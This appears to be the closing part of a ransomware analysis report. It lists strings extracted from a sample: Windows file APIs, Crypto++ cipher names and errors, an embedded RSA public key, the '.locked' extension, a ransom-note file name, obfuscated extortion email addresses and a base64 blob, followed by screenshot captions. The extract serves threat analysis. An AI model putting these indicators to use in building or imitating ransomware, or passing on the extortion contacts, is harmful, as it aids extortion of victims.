QueryPerformanceCounter
QueryPerformanceFrequency
ntdll.dll
: this object doesn't support resynchronization
StreamTransformation: this object doesn't support random access
RandomNumberGenerator: IncorporateEntropy not implemented
CryptoMaterial: this object contains invalid values
CryptoMaterial: this object does not support precomputation
AES
RC6
FeedbackSize
EncodingParameters
CipherModeBase: feedback size cannot be specified for this cipher mode
CTR
CBC
SHA-1
MGF1
RSA
internal error
NtReadFile
NtWriteFile
RtlInitUnicodeString
RtlFreeUnicodeString
MIGdMA0GCSqGSIb3DQEBAQUAA4GLADCBhwKBgQD4ZArmcis7vWav4PzdrEvWW2aWI++jYuDz BLI1OZv0SrEO3KoaPMj1cXV6a+GHdnjdiPUprU0dodJW7CagV/89WI72RZdVRYPVXNKoKtUz FM16KiguwKZ6ZY/ZdQCgLtwrZ/2r2KJmazrkctlQsz6WCcCETOM1ohdrvzzWjOzhYwIBEQ==
.locked
\??\\
FAILED
exception:
SuzuMcpherson[@]protonmail.com
AsuxidOruraep1999[@]o2.pl
README_LOCKED.txt
OAEP-
roscTKwrSJIojJmpnKZXdSfwxy0G7ZVouxnAnTQylqffQ9Ge7UdVL0p3Qft1CfyN7O0gH071 dbEF0Aimo6+qQklkQrQIrxuIuz3cuCg5xK3Ry9bKz8/7mirLDAOLdoxIhYHmxJzskAXXnTYk JwKWrbQRUZUnDTbZiUGjcQlJWCYs7lKv1MLs/q5nN0uqma1Y+G1LSXFR2svJJMy6cnbt3lmL xglZupMHv7LnkqDwFPg5SJ4CtPHzUz92OV9lG0OyIyfUh0DZflfr1PQbMYwlf6Ocus9EUrTT 2tHLu9n6BdbJE1sFpZjnFlbSlb73wb1PJawjBBjvHPzusZLeTbx6aK+K4wp0ZcJcNzFtFzzb H5Whl6n20JOZnHNVQGeBE0KmyxZcPXsRETMHJ3pEFoG6N6I+MyvUNbhxgOZr3/mjuf3MMQMZ PKvvfLkAV/Hgw4zeu+pIausNIoubG//CIyIfWvAHcyzmU6Gys96Q8BmgV7xlwxTpCwe6uKtV Dsx1u+NHqFiClZZCkYgkTodxxaMtaXwfzKdTbL7EF1odi9JnG9MwOYVBcQq9cHG/rv/QyU7g LdnLuMKI68i2/FDkh+RtKsy1b800KVuXjpSxvQacbNygLQ6OFuww4RrZn3+1UKSgWr3R7AEI PQ9J0V7QC9qaGUlQ+tbOb2MQNaNDEW4Ip1N4hAJVMlBfG5H9ZUwcv14D8dUSSgwbJuEPO10X 7Zw8klsW3CP9o3y3LnG1h+zGuRDME+7Sss9It+xC7qIdsBpPQKeemqDHqM0Ua44sR03j73d0 ffItBTWqwFbrwXoP9+It7gwlqI0A/0QkGg7/UfjBX5FnrAowdm9UHBzS162VhBLoabs1rVif BrhYWEHOnkcco/nPDroFtIgTn2pWOmTm21HRJ35TXpKrgVeniS7/fxsq6K42YWzS0SnqMDy5 sGewrnqG0LKBejlKsxUF6tsJYyRszs/JeIjrxs1gdZM8PfewqOjBUM5X0FexCeMF98auz49D 68pF58a8l+7uEyY47qZadkF4nvdrWKRNebVz96FnS29qrjl70X0ZMW20ekoVFSedQS6VqSAz mLm2oGgPepbuD7mjJcrO5bbg6zHAF5JyQ88SjE3SkOmOgPo8/0z2rDrwIiUWmejzUrRrZ2Xy sSIf3k8+rZisY1KUmD5A5FXE5JU/KkkgSlYDYOQeiKQNFz19yrfqUdSt2jUb4GxlgfYEaK56 Mu2CIRPwPGj/ugs+Apvnj2PebrCRYic9os5wnFp7Pt7n4ajMJFPSBHStm0f9dkZahDG4llYQ kF1Q8FLML+1UsRq+a41O8aRZg/A603pMbH9+sIKTecqNU7pGDrjMZm29dxxV7casZ9majyrR mmzYGXN3/vhXh78xV1WaRRGXyDDtikGXp/x9JgCNzu92s9fRZFz1T120t4TJwabzq8amFdSo aWQeI0d666yhkDIfHodBXLee8n7QAOhlHWFaC38Yh9Kg6cLeDF45Q+K/pTgiFAMgVPUX82nj PxkPGMY9+I1L+Fgw4T6Das7bLMEIiyltvX1JY3Avf346Ov94Guis1LNXLXCLaBEOm1g4LAzE aIOkWj8fpgXKMa1ubPrUnscY5K2poA+UMkKYRVNSl0eh9nrzcMf6qFZ6ZeIab/NSitoTKQQh XKRjy1ovNA052FWgBiRKCjxqlU3ThaEtdjFCjs9mxKdg2GSL+bRBkGKIuvNdFo7K40CPd6BK yDmrux2gkqXxOwfTNhVFN3wyyNKsS2ySA5o1SQAraLP2Wwfu51ycoPyVehR5tgWYZnYHUjF1 6sN0tm+8xqLqtZy+yg68HNO02JsJ/N2w9vcOhf0PjQpYUf8Kq3Gb5fnu
p D

--End Strings of Interest--

Screenshots
Screen_Shot_2019-03-31_at_10.06.59_AM.png -

Screen_Shot_2019-04-01_at_2.31.49_PM.png -

Figure 3 -

Figure 4 -